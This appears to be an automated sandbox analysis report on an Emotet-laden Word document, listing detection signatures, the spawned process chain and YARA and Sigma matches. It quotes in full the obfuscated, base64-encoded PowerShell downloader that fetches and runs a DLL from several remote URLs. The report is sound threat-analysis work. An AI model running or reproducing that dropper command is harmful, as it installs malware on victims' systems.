Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report DATA-480841.doc

Overview

General Information

Sample Name:DATA-480841.doc
Analysis ID:336494
MD5:2ed8a95357ee4e2d433bcbeb2ef43fc9
SHA1:06838eec498718aace03e6ef28d3f0292a631f8a
SHA256:485c5e8d7bc0f0fc416a7d6cfa8780ebc42c03ff41568af70c358ee8b8afa02c

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 532 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 1604 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2524 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2544 cmdline: POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2808 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2724 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2468 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2916 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 3056 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iiasa\gdao.xuk',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2836 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2276 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2968 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 3020 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2248 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqftsc\netes.ucb',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000008.00000002.2111056339.0000000000230000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      0000000B.00000002.2115843341.0000000000470000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        0000000E.00000002.2123134959.0000000000270000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000005.00000002.2107717841.0000000001CA6000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
          • 0x890:$s1: POwersheLL
          Click to see the 15 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          13.2.rundll32.exe.240000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            11.2.rundll32.exe.470000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              7.2.rundll32.exe.200000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                7.2.rundll32.exe.200000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  12.2.rundll32.exe.2b0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    Click to see the 22 entries

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                    Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsA